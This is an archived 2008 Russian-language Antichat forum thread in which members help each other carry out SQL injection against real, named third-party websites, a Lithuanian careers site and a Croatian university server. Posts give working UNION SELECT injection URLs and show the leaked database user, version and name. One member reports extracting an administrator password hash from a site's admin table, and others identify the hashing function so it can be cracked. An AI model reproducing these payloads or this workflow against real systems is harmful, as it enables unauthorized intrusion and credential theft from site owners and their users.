ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.09.2008, 00:35
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
че с этой мутью делать? как её перекодировать?
вывел с помощью mysql-inj:
Љ�гЊ�я
|
|
|
05.09.2008, 01:08
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
возможно это "свой" метод шифрования. Тебе бы не помешало посмотреть сорцы.
самый протсой метод шифрования - это:
1 беррётся Ascii код символа и к мне му прибавляется\отнимается\ка кое-то чисто. В итоге получается такая вот муть =)
|
|
|
|
05.09.2008, 01:45
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\'\'\'' at line 1
ничего и не получится - там параметр в ковычках, а ковычки экранизируются слешем
|
|
|
|
05.09.2008, 13:54
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529
Репутация:
41
|
|
Возможно ли провести иньекцию.
http://www.karjeroscentras.lt/lt.php/ieskantiems_darbo/darbo_skelbimai/darbo_skelbimai/347;f_ctitle;UAB%20%22Aidma%27%22
нашол ошибки а за юзать не выходит.
|
|
|
|
05.09.2008, 18:21
|
|
Познающий
Регистрация: 30.10.2007
Сообщений: 63
Провел на форуме:
299216
Репутация:
59
|
|
Сообщение от tor4)
Возможно ли провести иньекцию.
Возможно! (Чуть не написал "легко", нифига не так просто.  )
Код:
http://www.karjeroscentras.lt/lt.php/ieskantiems_darbo/darbo_skelbimai/darbo_skelbimai/347;f_ctitle;123'%20and%201=2%20union%20select%201,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8%23
karjeroscentras@195.14.170.12:4.0.18:karjeroscentr as
Можно пытаться раскручивать дальше. Иньекция не слепая, показывает запрос и количество полей, короче, время провёл не зря. (Даже не подозревал, что так могу. )
Если отдельные моменты будут непонятны - могу расписать, правда, не факт, что появлюсь тут до понедельника.
В любом случае, большое спасибо за увлекательную задачу.
|
|
|
|
05.09.2008, 18:29
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
вытянул пароль из таблицы admin
711de2ca756942dc
что за шифрование не подскажете? не мускульная ль функция?
|
|
|
|
05.09.2008, 18:52
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
o3,14um похоже это обычный mysql
|
|
|
|
05.09.2008, 19:09
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
да, так оно и есть, 100% мускульная функция пасвод
|
|
|
|
05.09.2008, 22:48
|
|
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062
Репутация:
155
|
|
помогите расскрутить скулю, я не шарю
домен пр5
http://web.ffos.hr/serv_file.php?file=-44'
|
|
|
|
05.09.2008, 23:11
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от .Striker
помогите расскрутить скулю, я не шарю
домен пр5
http://web.ffos.hr/serv_file.php?file=-44'
http://web.ffos.hr/serv_file.php?file=-44+union+select+1,2,concat_ws(0x40,version(),user( ),database()),4,5,6,7,8/*
вывод 3и4....4-название файла..3 внутри файла...
Последний раз редактировалось DimOnOID; 05.09.2008 в 23:14..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
